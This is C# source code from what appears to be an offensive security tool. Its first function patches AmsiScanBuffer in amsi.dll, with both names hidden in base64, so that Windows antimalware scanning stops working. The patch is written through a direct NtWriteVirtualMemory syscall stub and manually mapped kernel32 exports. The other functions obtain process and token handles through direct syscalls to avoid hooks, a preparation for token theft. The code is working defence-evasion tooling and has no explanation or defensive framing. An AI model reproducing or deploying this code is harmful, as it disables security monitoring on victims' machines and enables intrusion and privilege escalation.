public static bool handleAM(SysCallManager sysCall)
{
var hook = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
uint oldProtect = 0, x = 0;
var shellCode = sysCall.GetSysCallAsm("NtWriteVirtualMemory");
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
object[] loadLibrary = { Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw=")) };
IntPtr libraryAddress = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA",
typeof(DInvoke.Win32.DELEGATES.LoadLibrary), loadLibrary);
object[] procAddress = { libraryAddress, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")) };
var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress",
typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress);
if (address == IntPtr.Zero)
{
return(false);
}
object[] parameters = { (IntPtr)(-1), address, (UIntPtr)hook.Length, (uint)0x004, oldProtect };
IntPtr hProcess = Process.GetCurrentProcess().Handle;
IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
oldProtect = (uint)parameters[4];
object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtWriteVirtualMemory));
var arguments = new object[] { hProcess, address, hook, (UIntPtr)(hook.Length), IntPtr.Zero };
uint old = 0;
parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, old };
response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
var returnValue = sysCallDelegate.DynamicInvoke(arguments);
if ((int)returnValue != 0)
{
return(false);
}
parameters = new object[] { (IntPtr)(-1), address, (UIntPtr)hook.Length, oldProtect, x };
response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
return(true);
}
/////////////////////////// Processes related functions ///////////////////////////
public static void GetProcessHandle(int pid, out IntPtr handle, DInvoke.Win32.Kernel32.ProcessAccessFlags flags, SysCallManager sysCall)
{
handle = IntPtr.Zero;
var clientId = new DInvoke.Win32.Kernel32.CLIENT_ID()
{
UniqueProcess = new IntPtr(pid), UniqueThread = IntPtr.Zero
};
var objectAtt = new DInvoke.Win32.Kernel32.OBJECT_ATTRIBUTES(null, 0);
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
var shellCode = sysCall.GetSysCallAsm("NtOpenProcess");
object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite };
var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcess));
var token = IntPtr.Zero;
var arguments = new object[] { handle, flags, objectAtt, clientId };
var returnValue = sysCallDelegate.DynamicInvoke(arguments);
handle = (int)returnValue == 0 ? (IntPtr)arguments[0] : IntPtr.Zero;
}
public static void GetProcessToken(IntPtr handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS access, out IntPtr currentToken, SysCallManager sysCall)
{
DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken");
object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken));
var token = IntPtr.Zero;
var arguments = new object[] { handle, access, token };
uint oldProtect = 0;
object[] parameters = { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect };
IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
var returnValue = sysCallDelegate.DynamicInvoke(arguments);
currentToken = (int)returnValue == 0 ? (IntPtr)arguments[2] : IntPtr.Zero;
}
public static void GetProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SysCallManager sysCall)
{
var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken");
var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken));
var token = IntPtr.Zero;
var arguments = new object[] { handle, access, token };
var returnValue = sysCallDelegate.DynamicInvoke(arguments);
currentToken = (int)returnValue == 0 ? (IntPtr)arguments[2] : IntPtr.Zero;
}
public static void GetProcessHandle(int pid, out IntPtr handle, ProcessAccessFlags flags, SysCallManager sysCall)
{
handle = IntPtr.Zero;
var clientId = new CLIENT_ID()
{
UniqueProcess = new IntPtr(pid), UniqueThread = IntPtr.Zero
};
var objectAtt = new OBJECT_ATTRIBUTES(null, 0);
var shellCode = sysCall.GetSysCallAsm("NtOpenProcess");
var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcess));
var token = IntPtr.Zero;
var arguments = new object[] { handle, flags, objectAtt, clientId };
var returnValue = sysCallDelegate.DynamicInvoke(arguments);
handle = (int)returnValue == 0 ? (IntPtr)arguments[0] : IntPtr.Zero;
}
